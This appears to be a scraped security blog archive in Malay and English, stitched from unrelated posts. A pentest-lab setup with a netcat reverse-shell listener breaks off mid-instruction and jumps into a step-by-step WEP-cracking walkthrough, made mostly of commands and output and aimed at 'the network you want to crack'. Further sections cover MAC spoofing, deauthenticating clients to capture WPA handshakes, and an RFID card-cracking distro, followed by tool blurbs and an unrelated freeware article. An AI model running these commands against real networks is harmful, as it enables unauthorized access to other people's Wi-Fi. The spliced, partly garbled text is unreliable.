How to use Vyatta in vmware to simulate Hacking from inside network scenario

In the classes I taught i use Vmware Workstation 7 to create penetration testing Lab
and use Vyatta to simulate as Router, you can use Vyatta to simulate many scenario such as hack into DMZ ... etc, Vyatta support zone-base firewall.

you can download vyatta at the following link:
http://www.vyatta.org/downloads
Vyatta Document:
http://www.vyatta.org/documentation

Lab Diagram



Vm Image:
R1 - Vyatta have 2 nic , eth0 simulate as Wan , eth1 are Lan
Victim - Linux(u can use other operating system to create vuln image)
Attacker - Blackbuntu Linux

Vmware Configuration:
1. Create Vmware Team and add Lan segment in team, for Attacker-Network
please read http://www.vmware.com/support/ws5/doc/ws_team_create_wizard.html for more information how to create team in vmware
2. Add Vyatta image to team, set eth0 connect to NAT, eth1 connect to Lan segment in team
3. Add Blackbuntu to to team, set network interface (in my case are eth0) connect to eth1
3. Vuln Image (Victim) set network connect to NAT

Vyatta Configuration:
set hostname and ip address, etc..

set system host-name R2
set system domain-name blackbuntu.lan
set interfaces ethernet eth0 address 172.16.14.11/24
set system name-server 172.16.14.2
set system gateway-address 172.16.14.2
set interfaces ethernet eth1 address 192.168.1.1/24
set service ssh

Configuring DHCP Server:

set service dhcp-server shared-network-name ETH1_POOL subnet 192.168.1.0/24 start 192.168.1.20 stop 192.168.1.200
set service dhcp-server shared-network-name ETH1_POOL subnet 192.168.1.0/24 default-router 192.168.1.1
set service dhcp-server shared-network-name ETH1_POOL subnet 192.168.1.0/24 dns-server 172.16.14.2

## Configuring NAT

set service nat rule 1 source address 192.168.1.0/24
set service nat rule 1 outbound-interface eth0
set service nat rule 1 type masquerade


## Configuring Firewall:
## Define a firewall rule set:

set firewall name ALLOW_ESTABLISHED
set firewall name ALLOW_ESTABLISHED rule 10
set firewall name ALLOW_ESTABLISHED rule 10 action accept
set firewall name ALLOW_ESTABLISHED rule 10 state

## Apply the rule set to an interface:

set interfaces ethernet eth0 firewall in name ALLOW_ESTABLISHED
set interfaces ethernet eth0 firewall local name ALLOW_ESTABLISHED
commit
save

After commit and save, at this point you should ping and can connect from Blackbuntu(Attacker) to Victim (and internet too)

### Config port forward ###
Scenario/Question:
When we hack into victim, if we want to reverse shell back to Blackbuntu box that locate at inside network behind NAT,What can we do?

Solution/Answer:
Configure DNAT rules with port destination and firewall destination rules.
Example: on Blackbuntu box we listening on port 80 for incoming connection with command
$nc -lvvp 80
on vyatta should config DNAT like this:

cara guna aircrack guna windows pulak

untuk guna dalam windows kene download aircrack versi windows punya.selepas download letak kat drive C dalam mycomputer

ikut step-step dibawah..selamat mencuba

NOTE: I’m going to base the rest of this tutorial on a card with the commview drivers installed!

- Next step is to download this .dll file (again only commview driver users):
http://darkircop.org/commview.dll

- Next up, download the aircrack package. Download it here:
http://dl.aircrack-ng.org/aircrack-ng-svn-win.zip

unzip the file to your c:\ drive (it can be another drive but this is the easiest)

put the commview.dll file you just downloaded in the map you extracted (it’s called aircrack and if you extracted it to your c: drive like I said it should be in c:\aircrack\)

Now go to you place where you installed Commview in (the program itself) and look for a file called “ca2k.dll” (default install dir is c:\program files\commview for wifi\)

Copy this file to the same folder as the commview.dll (c:\aircrack\)

OKAY that was a whole lot! this was just to get everything ready! If you did all of this correct you’ll be able to move to the next step!
——————————————————————————————-

THE CRACKING:

Step 1:
- Open a command prompt (start > run > cmd.exe)

Step 2:
- type the following in the command prompt:

Quote:
cd c:\aircrack\

- HIT ENTER

Step 3:
- type the following in the same command prompt:

Quote:
airserv-ng -d commview.dll

- HIT ENTER
- You should see something like this coming up in the command prompt

Quote:
Opening card commview.dll
Setting chan 1
Opening sock port 666
Serving commview.dll chan 1 on port 666
Step 4:
- Open a new command prompt (LEAVE THE PREVIOUS ONE OPEN AT ALL TIMES!!)
- Typ the following the the new command prompt:

Quote:
cd c:\aircrack\

-HIT ENTER

Step 5:
- Now typ this in the same command prompt:

Quote:
airodump-ng 127.0.0.1:666

- HIT ENTER

note: if you know what channel the to-monitor-network is on you can make it this. I recommend this!:

Quote:
airodump-ng –channel YOURCHANNELNUMBER HERE 127.0.0.1:666
Airodump-ng should start capturing data from the networks on the given channel now, you’ll notice it isn’t going fast (except if it’s a big company’s network or something). We are going to speed this process up!
Take a note of the following:
1: BSSID of the network you want to crack = MAC address.
2: ESSID of the network you want to crack = name of the network (example: wifi16, mynetwork,…)
3: The mac of the card you are using to monitor the packets

LEAVE THE 2 COMMAND PROMPTS YOU ALREADY HAVE OPEN OPEN!!!

Step 6:
- Open a new command prompt
- Type in the following:

Quote:
cd c:\aircrack\

- HIT ENTER

Step 7:
- Type in the following in command prompt:

Quote:
aireplay-ng -1 0 -e ESSID-OF-THE-NETWORK-YOU-WANT-TO-CRACK -a BSSID:OF:THE:NETWORK:YOU:WANT:TO:CRACK -h MAC:OF:THE:CARD:YOU:ARE:USING:TO:MONITOR 127.0.0.1:666
yes quite confusing so a quick example:
ESSID = wifi16
BSSID = 11:22:33:44:55:66
MAC OF CARD I’M USING = 01:23:45:67:89:01

so that will get me:
aireplay-ng -1 0 -e wifi16 -a 11:22:33:44:55:66 -h 01:23:45:67:89:01 127.0.0.1:666

if all goes well you’ll get this as the outcome:

Quote:
Sending Authentication Request
Authentication successful
Sending Association Request
Association successful
if you get:

Quote:
AP rejects the source MAC address

It means MAC filtering is enabled on the network you want to crack and you’ll need to get hold of a mac address that’s allowed access.

if you keep getting:

Quote:
sending authentication request

Try moving closer to the AP!

Step 8:
in the same command prompt as the one in step 7 type:

Quote:
aireplay-ng -5 -b BSSID:OF:THE:NETWORK:YOU:WANT:TO:CRACK -h MAC:OF:THE:CARD:YOU:ARE:USING:TO:MONITOR 127.0.0.1:666
yes quite confusing once again so a quick example:
BSSID = 11:22:33:44:55:66
MAC OF CARD I’M USING = 01:23:45:67:89:01

so that will get me:
aireplay-ng -5 -b 11:22:33:44:55:66 -h 01:23:45:67:89:01 127.0.0.1:666

if all goes well you’ll get this:

Quote:
Waiting for a data packet…
Read #number packets…


Step 9:
if you wait a little bit you’ll soon be prompted with a packet like this:

Quote:
Size: 120, FromDS: 1, ToDS: 0 (WEP)
BSSID = the bssid
Dest. MAC = the dest mac
Source MAC = the source mac

0×0000: 0842 0201 000f b5ab cb9d 0014 6c7e 4080 .B……….l~@.
0×0010: 00d0 cf03 348c e0d2 4001 0000 2b62 7a01 ….4…@…+bz.
0×0020: 6d6d b1e0 92a8 039b ca6f cecb 5364 6e16 mm…….o..Sdn.
0×0030: a21d 2a70 49cf eef8 f9b9 279c 9020 30c4 ..*pI…..’.. 0.
0×0040: 7013 f7f3 5953 1234 5727 146c eeaa a594 p…YS.4W’.l….
0×0050: fd55 66a2 030f 472d 2682 3957 8429 9ca5 .Uf…G-&.9W.)..
0×0060: 517f 1544 bd82 ad77 fe9a cd99 a43c 52a1 Q.D…w…..0×0070: 0505 933f af2f 740e …?./t.

Use this packet ?

note: size can vary, I always pressed in y and it worked
- press in Y
- HIT ENTER

You should see something like this coming up (or similar):

Quote:
Saving chosen packet in replay_src-0124-161120.cap
Data packet found!
Sending fragmented packet
Got RELAYED packet!!
Thats our ARP packet!
Trying to get 384 bytes of a keystream
Got RELAYED packet!!
Thats our ARP packet!
Trying to get 1500 bytes of a keystream
Got RELAYED packet!!
Thats our ARP packet!
Saving keystream in fragment-0124-161129.xor
Now you can build a packet with packetforge-ng out of that 1500 bytes keystream
Note 1: It doesn’t need to be 1500 bytes!!
Note 2: Check the bold part, you’re going to need this file!
AGAIN DON’T CLOSE THIS COMMAND PROMPT!!

if you keep getting:

Quote:
Data packet found!
Sending fragmented packet
No answer, repeating…
Trying a LLC NULL packet
Sending fragmented packet
No answer, repeating…
Sending fragmented packet
…

Just keep trying! It automatically starts over again (moving closer to the AP has been reported to help.)

anyways, if you got the bytes of keystream (everything worked) it’s time for the next step!

Step 10:
- Press CTRL + C in the command prompt used in step 8
- Now type in the following:

Quote:
packetforge-ng -0 -a BSSID:OF:THE:NETWORK:YOU:WANT:TO:CRACK -h MAC:OF:THE:CARD:YOU:ARE:USING:TO:MONITOR -k 192.168.1.100 -l (= an ELL not a 1) 192.168.1.1 -y fragment-0124-161129.xor -w arp-request
Remember the file I made bold in part 8? Well it’s obviously the same as in 9 meaning you need to put the same filename here.
The part I made green here is the filename you use to save the packet, you can choose whatever you want but you must use this filename in the upcomming steps!

Step 11:
Now that we’ve got our ARP REQ packet we can start injecting!
Here’s how to do this.
- Go to the command prompt used in step 9
- Type in the following:

Quote:
aireplay-ng -2 -r arp-request 127.0.0.1:666

The green part once again indicates the filename!

You should now see something like this coming up:

Quote:
Size: 68, FromDS: 0, ToDS: 1 (WEP)
BSSID = 00:14:6C:7E:40:80
Dest. MAC = FF:FF:FF:FF:FF:FF
Source MAC = 00:0F:B5:AB:CB:9D

0×0000: 0841 0201 0014 6c7e 4080 000f b5ab cb9d .A….l~@…….
0×0010: ffff ffff ffff 8001 6c48 0000 0999 881a ……..lH……
0×0020: 49fc 21ff 781a dc42 2f96 8fcc 9430 144d I.!.x..B/….0.M
0×0030: 3ab2 cff5 d4d1 6743 8056 24ec 9192 c1e1 :…..gC.V$…..
0×0040: d64f b709 .O..

Use this packet ?


- Type in Y
- HIT ENTER

This should come up now:

Quote:
Saving chosen packet in replay_src-0124-163529.cap
You should also start airodump-ng to capture replies.
End of file.
sent #numberOfPackets … (#number pps)


You’ll see the numberOfPackets rising really fast, you are injecting these packets now.

Step 12:
Now go back to the command prompt where you had airodump-ng in open
and press CTRL + C
now type in the following:

Quote:
airodump-ng –channel CHANNELYOUWANTTOCAPTUREFROM –write Filename 127.0.0.1:666

Note: Filename = The name of the file where the data packets are saved, this will be used in the next step

If all goes correct you should be capturing as much packets per second as you are injecting (maybe even more).

Step 13:
when you think you have enough…
note: 200000 min for 64bit (just capture 1Million to be sure)
…press CTRL + C in the command prompt that has airodump-ng running and enter the following:

Quote:
aircrack-ng -n 64 Filename.cap
note:
Filename = see previous step
64 = the bit depth of the key (128 for 128bit etc…)

hack wifi used aircrack

security dalam wireless yang biasa digunakan ialah
open = memang openlah
wep = ada password tapi boleh hack
wep2/psk = ada password tapi sukar sikit nak hack

oleh itu disini kita gunakan os backtrack

airmon-ng - script used for switching the wireless network card to monitor mode
airodump-ng - for WLAN monitoring and capturing network packets
aireplay-ng - used to generate additional traffic on the wireless network
aircrack-ng - used to recover the WEP key, or launch a dictionary attack on WPA-PSK using the captured data

setup airmon-ng

ok mula - mula test command di bawah
iwconfig (untuk melihat status wireless card itu sama ada wlan0,wlan1 dan dll)
airmon-ng start wlan0 (untuk set monitor mode, nama card ini akan digunakan untuk proses aircrack nanti)
cth :wlan0

Other related Linux commands:

ifconfig (to list available network interfaces, my network card is listed as wlan0)
ifconfig wlan0 down (to stop the specified network card)
ifconfig wlan0 hw ether 00:11:22:33:44:55 (change the MAC address of a NIC - can even simulate the MAC of an associated client. NIC should be stopped before chaning MAC address)
iwconfig wlan0 mode monitor (to set the network card in monitor mode)
ifconfig wlan0 up (to start the network card)
iwconfig - similar to ifconfig, but dedicated to the wireless interfaces.

Recon Stage (airodump-ng)

airodump-ng mon0: command ini digunakan untuk scan; "mon0" itu adalah nama wireless card yg digunakan.kalau wlan0 gunelah "airodump-ng wlan0" akan keluar seperti page dibawah



gambar diatas menunjukkan BSSID , PWR , BEACONS , CH ,ESSID
kat sini kite perlukan BSSID,CH,ESSID untuk proses seterusnye kerana:
BSSID = menunjukkan mac address modem wireless tersebut
CH = channel yg digunakan
ESSID = nama wireless yg digunakan

Increase Traffic (aireplay-ng) - optional step for WEP cracking

ni command die
aireplay-ng -3 -b 00:0F:CC:7D:5A:74 -h 00:14:A5:2F:A7:DE -x 50 wlan0

-3 --> this specifies the type of attack, in our case ARP-request replay
-b ..... --> MAC address of access point
-h ..... --> MAC address of associated client from airodump
-x 50 --> limit to sending 50 packets per second
wlan0 --> our wireless network interface



notes:
To test whether your nic is able to inject packets, you may want to try: aireplay-ng -9 wlan0. You may also want to read the information available -here-.
To see all available replay attacks, type just: aireplay-ng

bile dah proses aireplay ini berjaya terdapat satu file.cap telah di save

Crack WEP (aircrack-ng)

WEP cracking is a simple process, only requiring collection of enough data to then extract the key and connect to the network. You can crack the WEP key while capturing data. In fact, aircrack-ng will re-attempt cracking the key after every 5000 packets.

o attempt recovering the WEP key, in a new terminal window, type:

aircrack-ng data*.cap (assuming your capture file is called data...cap, and is located in the same directory)



Notes:
If your data file contains ivs/packets from different access points, you may be presented with a list to choose which one to recover.
Usually, between 20k and 40k packets are needed to successfully crack a WEP key. It may sometimes work with as few as 10,000 packets with short keys.

Crack WPA or WPA2 PSK (aircrack-ng)

WPA, unlike WEP rotates the network key on a per-packet basis, rendering the WEP method of penetration useless. Cracking a WPA-PSK/WPA2-PSK key requires a dictionary attack on a handshake between an access point and a client. What this means is, you need to wait until a wireless client associates with the network (or deassociate an already connected client so they automatically reconnect). All that needs to be captured is the initial "four-way-handshake" association between the access point and a client. Essentially, the weakness of WPA-PSK comes down to the passphrase. A short/weak passphrase makes it vulnerable to dictionary attacks.

To successfully crack a WPA-PSK network, you first need a capture file containing handshake data. This can be obtained using the same technique as with WEP in step 3 above, using airodump-ng.

You may also try to deauthenticate an associated client to speed up this process of capturing a handshake, using:

aireplay-ng --deauth 3 -a MAC_AP -c MAC_Client mon0 (where MAC_IP is the MAC address of the access point, MAC_Client is the MAC address of an associated client, mon0 is your wireless NIC).

The command output looks something like:
12:34:56 Waiting for beakon frame (BSSID: 00:11:22:33:44:55:66) on channel 6
12:34:56 Sending 64 directed DeAuth. STMAC: [00:11:22:33:44:55:66] [ 5:62 ACKs]

Note the last two numbers in brackets [ 5:62 ACKs] show the number of acknowledgements received from the client NIC (first number) and the AP (second number). It is important to have some number greater than zero in both. If the first number is zero, that indicates that you're too far from the associated client to be able to send deauth packets to it, you may want to try adding a reflector to your antenna (even a simple manilla folder with aluminum foil stapled to it works as a reflector to increase range and concentrate the signal significantly), or use a larger antenna.

Computer Forensic Framework-PTK

kat sini nak share satu benda.selalu dengar PTK ni untuk orang goment tapi tuk computer forensic pun ada jugak.kat sini saya nak terangkan serba sedikit mengenai ape die PTK

compuer forensic nmerupakan sains digital digunakan untuk analisis,mengenalpasti informasi coding2 atau dll

dalam os backtrack 5 ia terdapat didalam forensic tools kira tak payah lagi nak download sbb die dah ada.
Beside tools and tricks there are numerous training available on Internet.
PTK forensics is a computer forensic framework for the command line tools in the SleuthKit plus much more software modules. This makes it usable and easy to investigate a system.

PTK forensics is more than just a new graphic and highly professional interface based on Ajax and other advanced technologies; it offers numerous features such as analysis, search and management of complex digital investigation cases.


Ubuntu
MAC OSX
Centos
Kubuntu
If you are using backtrack 5, than there is no need to download PTK because it is available on backtrack5.

Download

GMER is an application that detects and removes rootkits .

GMER is a tools used for detects and removes rootkits. Day before yesterday we talked about rootkits in addition to that heres another effective root kit removewer GMER.
GMER scans for
It scans for:

hidden processes
hidden threads
hidden modules
hidden services
hidden files
hidden disk sectors (MBR)
hidden Alternate Data Streams
hidden registry keys
drivers hooking SSDT
drivers hooking IDT
drivers hooking IRP calls
inline hooks

for information klick is here

AppWall: Protect Critical Web Applications with Radware Web Application Firewall.

APSolute Web Security and Compliance with AppWall: Taking Web Application Security to the Next Level

Radware’s AppWall® is a Web Application Firewall (WAF) appliance that secures Web applications and enables PCI compliance by mitigating web application security threats and vulnerabilities. It prevents data theft and manipulation of sensitive corporate and customer information.

Complete Web Application Protection

Full coverage out-of-the-box of OWASP top-10 threats ─including injections, cross site scripting (XSS), cross site request forgery (CSRF), broken authentication and session management and security mis-configuration .
Data leak prevention – identifying and blocking sensitive information transmission such as credit card numbers (CCN) and social security numbers (SSN).
Zero-day attacks prevention – AppWall positive security profiles limiting the user input only to the level required by the application to properly function, thus blocking also zero day attacks. The positive security profiles are a proven protection against zero-day attacks.
Protocol validation – AppWall enables HTTP standards compliance to prevent evasion techniques and protocol exploits.
XML and Web services protection - AppWall offers a rich set of XML and web services security protections, including XML validity check web services method restrictions, XML structure validation to enforce legitimate SOAP messages and XML payloads.
Web application vulnerabilities – signature protection offer the most accurate detection and blocking technology of web application vulnerability exploits. AppWall negative security profiles offers comprehensive attack protection.

Fully Addresses PCI DSS 2.0 Requirement 6.6

The Payment Card Industry (PCI) issued Data Security Standard (DSS) to phttp://www.blogger.com/img/blank.gifrevent financial fraud and information leak from on-line businesses processing credit cards. AppWall fully addresses requirement 6.6 by:

Protecting credit card numbers leakage and use of web hacking techniques to disclose information processed through web applications
Out-of-the-box PCI policies
PCI compliance reports

for information click here

WPSCAN - WordPress Security & vulnerability Scanner

WPSCAN - WordPress Security & vulnerability Scanner



WPScan is a vulnerability scanner which checks the security of WordPress installations using a black box approach.

Details
Username enumeration (from author querystring and location header)
Weak password cracking (multithreaded)
Version enumeration (from generator meta tag)
Vulnerability enumeration (based on version)
Plugin enumeration (2220 most popular by default)
Plugin vulnerability enumeration (based on version) (todo)
Plugin enumeration list generation
Other misc WordPress checks (theme name, dir listing, ...)

RootRepeal – Rootkit Detector v1.3.5 Download Now

RootRepeal – Rootkit Detector v1.3.5 Download Now


RootRepeal is a new rootkit detector currently in public beta. It is designed with the following goals in mind:

> Easy to use – a user with little to no computer experience should be able to use it.
> Powerful – it should be able to detect all publicly available rootkits.
> Stable – it should work on as many different system configurations as possible, and, in the event of an incompatibility, not crash the host computer.
> Safe – it will not use any rootkit-like techniques (hooking, etc.) to protect itself.

Currently, RootRepeal includes the following features:
Driver Scan – scans the system for kernel-mode drivers. Displays all drivers currently loaded, and shows if a driver has been hidden, and whether the driver’s file is visible on-disk.
Files Scan – scans any fixed drive on the system for hidden, locked or falsified* files.
Processes Scan – scans the system for processes. Displays all processes currently running, and shows if a processes is hidden or locked.
SSDT Scan – shows whether any of the functions in the System Service Descriptor Table (SSDT) are hooked.
Stealth Objects Scan – attempts to determine if any rootkits are active by looking for typical symptoms.
Hidden Services Scan – scans for hidden system services.
Shadow SSDT Scan – counterpart to the SSDT Scan, but deals mostly with graphics and window-related functions.

RootRepeal is currently in public beta. Whereas every effort has been made to ensure compatibility with every system configuration on Windows 2000, XP, 2003 and Vista, it cannot be guaranteed. There is always some risk when scanning for rootkits. Before running RootRepeal, please make sure you have backups of all important data and have saved all open documents.

DOWNLOAD HERE

10 free software downloads for your laptop

Have a laptop or netbook and want to get more out of it? You’re not alone. We’ve experienced the frustration of trying to keep data or bookmarks on a portable synchronised with those of a desktop PC or other laptops. We’ve struggled with diminishing battery life. We’ve needed assistance getting connected at hotspots or staying safe once online. And we’ve wondered how to take full advantage of USB flash drives.


But we’ve found help, and it’s all free. Here are ten no cost pieces of downloadable software that will solve your synchronisation, battery, Wi-Fi and USB woes. They’ll make it easier and more fun to get your work done, too.

Synchronisation Tools
If you own a desktop in addition to a laptop, you constantly have to deal with synchronising files and folders between them. If you’re not careful, you’ll end up working on older files on one computer while the newer versions sit on the other. Worse yet, when copying files between the machines, you might accidentally overwrite a newer version with an older one. The following three freebies solve those problems for you. They can synchronise your files automatically, and they can even synchronise between PCs and Macs.

SugarSync Free

This excellent software does double duty as a synchronisation tool and as an automated backup program. Exceedingly simple to use, it offers 2GB of free online backup space, takes up little RAM and few system resources, and works with Macs as well as PCs. All that, and it’s free.

Simply install the software on your computers and indicate which folders to synchronise. SugarSync Free then works in the background. If the computer to which you wish to sync is not online, the files will sync to it when it returns. In addition to syncing the files, SugarSync Free backs them up online.

You can do a lot more, too, such as sharing files and folders with other people. The software also keeps older versions of your file online so that you can revert to any of them.

The free edition of the software will synchronise only two computers, and it has a limit of 2GB of online storage space. For-pay versions let you synchronise among multiple PCs and offer faster upload speeds; prices range from $5 per month to $25 per month.

Download SugarSync Free | Price: Free

Windows Live Sync

What if you want to synchronise your laptop with more than one other desktop or laptop, but you don’t want to spend the money that SugarSync charges for it? Give the free Windows Live Sync a try. With this tool, you can sync folders on as many computers as you want, and you don’t have to pay a penny. Keep in mind, however, that this software doesn’t include online backup; it only synchronises folders from computer to computer.

Using Windows Live Sync is even easier than working with SugarSync Free. The method of adding and removing folders is more straightforward. Since you manage everything from a website, you can set up your synchronisation options in a single step rather than multiple ones.

Like SugarSync, Windows Live Sync works with Macs as well as PCs. However, I have been unable to get the software to work with Snow Leopard, the newest version of Mac OS X. If you want to synchronise with a Snow Leopard Mac, you may run into problems.

Download Windows Live Sync | Price: Free

Xmarks

Here’s a common problem for laptop owners who also have another machine: How do you keep your Favorites and bookmarks synchronised among all your computers? Let’s say that you browse the web on your laptop, adding a few bookmarks and deleting a few. The next day you use your desktop, but of course it doesn’t have the latest bookmark changes you made. Trying to make the corresponding additions and deletions on the desktop’s web browser can be time consuming, and that’s assuming you even remember them all.

Xmarks solves the problem neatly. It synchronises the bookmarks on multiple PCs, and better yet, it does so between browsers as well: With its help, you can keep Internet Explorer bookmarks on one PC synchronised with Firefox bookmarks on another. The tool even works on multiple operating systems, including Windows, Mac, and Linux.

The software used to be known as Foxmarks. Since then, its creators have updated it with additional features, including the ability to offer information about sites when you conduct searches. The extras are useful, but you’ll really want this software for its synchronisation of the bookmarks on all your PCs.

Download Xmarks | Price: Free

Laptop Battery Managers
Ah, batteries, the bane of every laptop owner’s existence. They never seem to have enough power, and they run out far too quickly. These downloads will help you manage your laptop’s battery life, and they can even help you get more juice out of a single charge.

BattCursor

You have work to do, but you know that your battery is starting to run out. So you keep checking the laptop’s battery icon to see how much power is left and every time you check, you waste precious time. Sound familiar?

This clever, free program shows your laptop’s remaining battery life on your mouse cursor. The app can display the information on your desktop, as well.

You can have the cursor text’s color and transparency level change, depending on the power level. For example, you can set the program to keep the text transparent in cases when your laptop is connected to a power source, but visible if the portable is unplugged and below a certain power level. BattCursor has a lot of extras, too, such as ways to improve your notebook’s battery life.

Download BattCursor | Price: Free

BatteryBar

Want to check battery life, but don’t like the idea of having your mouse pointer display the text? Here’s another alternative. BatteryBar shows, on your taskbar, exactly how much juice you’ve already used and how much you have left. You can set the app to display remaining battery life either as a percentage or as an amount of time.

Hover your mouse over BatteryBar, and you’ll see even more information, including the total battery capacity, the discharge rate, the battery wear, and how much total capacity your battery has in terms of time per full charge.

When you first run the program, it won’t appear to work. You’ll need to configure your taskbar to display it. Right click the taskbar, and select Toolbars, Taskbar. Once you do that, the program will appear.

Download BatteryBar | Price: Free

Wireless Networking Utilities
One of the main reasons to use a laptop is that you can connect wirelessly when you’re away from your home or office. But finding a connection, and keeping safe when you are connected, can be problematic. Here are two downloads that can help.

Hotspot Shield

When you use your laptop to connect to a hotspot at a public location such as a coffee shop or airport, you put yourself at risk. Hackers may be able to sniff your data packets, invade your PC and steal your username and password when you log in to websites.

Here’s a freebie that promises to keep you safe by encrypting your connection when you’re at a hotspot so that no one else can read the information you send. The program is extremely easy to use. Install it and it logs you in to a virtual private network (VPN) that performs the encryption.

A few installation notes: If you don’t want various toolbars to install too, make sure to uncheck the boxes next to the toolbar items during installation. And if you don’t want your home page and search engine to be changed, uncheck those options as well.

Download Hotspot Shield | Price: Free

WeFi

If you’re a laptop owner and a fan of social networking, you can combine the two with WeFi. Not only does this program find hotspots so that you can connect to them, but it also finds people to whom you can connect as well. After you install WeFi, the app lists nearby hotspots along with information about each, such as the signal strength and whether the hotspot is encrypted. To connect to one, double click it. You can also go to a web page that displays a map of where you are and shows nearby hotspots.

To see people who are connected to hotspots near you, click the People tab. You can then see more information about any of them, and get in touch with them via the software.

WeFi also includes a feature that will warn you away from suspicious web pages. If you prefer, however, you can turn it off during the installation process: Uncheck the box next to Include Wi-Fi Secure Browsing.

Note that this program will make WeFi Search your home page, establish WeFi Search as your default search, and install a toolbar. If you prefer that it not do that, during the installation process select Custom and uncheck the boxes for Toolbar, Make WeFi Search my default search engine, and Make WeFi Search my homepage. Also, during installation, WeFi will ask you to install a variety of additional software. To be safe, uncheck the boxes next to those items.

Download WeFi | Price: Free

USB Flash Drive Programs
USB flash drives are designed to be portable, just like your laptop. But they can be problematic. For one thing, how can you make sure that your files aren’t compromised in the event that you lose your drive? We have a few downloads to help with that, and more.

PortableApps

If your laptop or netbook has only a modest hard drive, you may not be able to fit all of your applications on it. Microsoft Office, for example, can occupy plenty of hard disk space and leave you little room for anything else.

With PortableApps, you won’t have that problem. In this download you get a full suite of free applications, including OpenOffice.org, which has a word processor, a spreadsheet, a presentation program, a database, and a drawing program. You’ll also find an antivirus utility, a slimmed down version of Firefox, and more. In addition to the applications, you get backup software, plus a menu that makes accessing all of the programs easy.

The Light version takes up just 150MB installed, and the more full featured Standard version consumes 355MB. You can install the software on your laptop or netbook of course, but to save space you can install the programs on a USB drive and even run them from there. You can store your data on the USB drive as well. No matter how little storage space your laptop or netbook has, you’ll be set.

Download PortableApps Standard | Price: Free

Download PortableApps Light | Price: Free

TrueCrypt

USB drives are a great way to carry work with you when you travel. They’re light, they’re cheap, and they have enough capacity to handle large image files, hefty documents, and entire presentations. But you can easily lose or misplace them, a serious problem if your files are personal or sensitive.

The free TrueCrypt does an excellent job of keeping your files safe from prying eyes, even if your USB drive falls into the wrong hands. You get a choice of many different encryption algorithms, including the powerful 256-bit AES and 448-bit Blowfish methods. The program will not just encrypt the files and folders, but also hide them so that no one but you knows that they are there.

This isn’t the most intuitive of programs to work with, so take some time to read the manual and be sure to use the program’s built-in wizards.

Download TrueCrypt | Price: Free

Computer Forensic Framework-PTK

Computer forensic is a branch of digital forensic science and an act to investigate, analyze, identify and collect evidence or information which is encoded or store.
Computer forensic science is a growing field and different colleges offers variety of degree in this field, however there are different tools and tricks available to do the job done. In backtrack 5 there is a separate section for forensic tools.

Beside tools and tricks there are numerous training available on Internet.
PTK forensics is a computer forensic framework for the command line tools in the SleuthKit plus much more software modules. This makes it usable and easy to investigate a system.

PTK forensics is more than just a new graphic and highly professional interface based on Ajax and other advanced technologies; it offers numerous features such as analysis, search and management of complex digital investigation cases.

Key Features


fficient File Analysis
Easier to use, PTK is based on Ajax
PTK is a dynamic web application with centralised -Database. More investigatots can work on the same case at te same time
PTK is a forensic analysis framework; in fact, PTK does not address incident response issues
Its main aim is to help small groups of investigators execute complex consultancy quickly and efficiently
A log of all operations performed by the investigators is kept
Case features shared by: Multiple investigators and case lock
It is available on both free and pro version. It has been tested on various Linux distribution includes:
Ubuntu
MAC OSX
Centos
Kubuntu
If you are using backtrack 5, than there is no need to download PTK because it is available on backtrack5.

Downl0ad

Requiremnt
Linux
MySQL server 5 or higher
Apache web server 2 or higher
PHP 5
Web browser (Mozilla, Safari)
SleuthKit
Tutorial
After downloading, move to your apache www directory and extract the package. Open browser and use the URL to start installer page.
http://localhost/ptk/install.php

RFID bootable Live Hacking System

he bootable Live RFID Hacking System contains a ready-to-use set of hacking tools for breaking and analyzing MIFARE Classic RFID cards and other well known card formats. It is built around PCSC-lite, the CCID free software driver and libnfc that gives you access to some of the most common RFID readers.


List of tools included

pcscd – you need to run this daemon in a separate terminal before running any RFID reader related tools in this bootable Live distribution. We use a wrapper script which callls pcscd in superuser-mode with the correct parameters.
baudline FFT signal analyzer for sniffing LF RFID tags using our sound card based RFID sniffer/emulator (more information soon!).
hexdump & od for converting binary dumps into hexfiles for easier editing and kdiff3 difference analysis.
kdiff3 – for displaying differences between card hexdump text files
vbindiff – for displaying difference between card dump binary files
‘bsdiff/bspatch – binary diff/patch tool
lsnfc (for guessing the card type)
gtkterm serial console utility.
nfc-anticol (runs full ISO14443A anticollision)
nfc-list
pn53x-diagnose
pn53x-sam
pn53x-tamashell
RSA_SecurID_getpasswd
And much more

Note: for 64bit x86 systems only!

Download RFID bootable Live Here

tq pentestit.com

Bokken: A pyew GUI for Malware Analysis!

Bokken was recently introduced in Inguma penetration toolkit (version 0.3 to be precise!). Now, it has also been released as a stand-alone tool for malware analysis. In actuality, Bokken is a GUI for the pyew tool. So, you know that it can do all that pyew can, with a nice user interface.

o, what is pyew and what all can it do? Pyew is like another tool we wrote about – radare. Pyew is a (command line) python tool mainly, to analyze malware. It does have support for hexadecimal viewing, disassembly (Intel 16, 32 and 64 bits), PE and ELF file formats (it does code analysis the right way), following direct call/jmp instructions, OLE2 format, PDF format (limited) and more. It also supports plugins to add more features to the tool. Now that is quiet a lot of functions!

However, it should be known that Bokken is not an hexadecimal editor neither a full featured disassembler as yet. So it should not be used for deep code analysis or you might want to avoid modifying files with Bokken. It’s intended to be a *iew like oriented tool, mainly, to analyze malware. Actually Bokken can parse and help in the analysis of PE/Elf, PDF and websites; any other file can be also opened and studied but Bokken won’t analyze it. To be precise, Bokken can help you scan the following:

> PE/Elf files can be analyzed in hexacecimal and disassembly formats and further information can be gained with the plugins.
> Web sites can also be analyzed for malware or security issues.
PDF files are supported and some features can aid in it’s examination for malicious code.
> Finally all other files can be studied whether they are in binary or plain text format.

Bokken requirements are just a few and easy to install. In order to get Bokken working you will need:

> Pyew
> PyGtk
> GtkSourceview2
> TidyLib
> Psyco

Download Bokken 1.0 (bokken-1.0.tar.gz/bokken-1.0.zip) here.

tq pentestit.com because sharing.

WPScan: A WordPress Security Scanner!

WPScan is a black box WordPress Security Scanner written in Ruby which attempts to find known security weaknesses within WordPress installations. Its intended use it to be for security professionals or WordPress administrators to asses the security posture of their WordPress installations. The code base is Open Source and licensed under the GPLv3. It has been brought to us by Ryan Dewhurst AKA ethicalhack3r.

Features of wpscan:

Username enumeration (from author)
Weak password cracking (multithreaded)
Version enumeration (from generator meta tag)
Vulnerability enumeration (based on version)
Plugin enumeration (todo)
Plugin vulnerability enumeration (based on version) (todo)
Other miscellaneous checks
Most of the blogging sites run on WordPress which often gets hack for simple lamp post errors. WPScan can simply help to find those known errors which can be avoided.

Basic requirements:
WPScan requires two non-native Ruby gems, typhoeus and xml-simple. It should work on both Ruby 1.8.x and 1.9.x.

How to run wpscan?
1. ruby wpscan.rb –url www.example.com
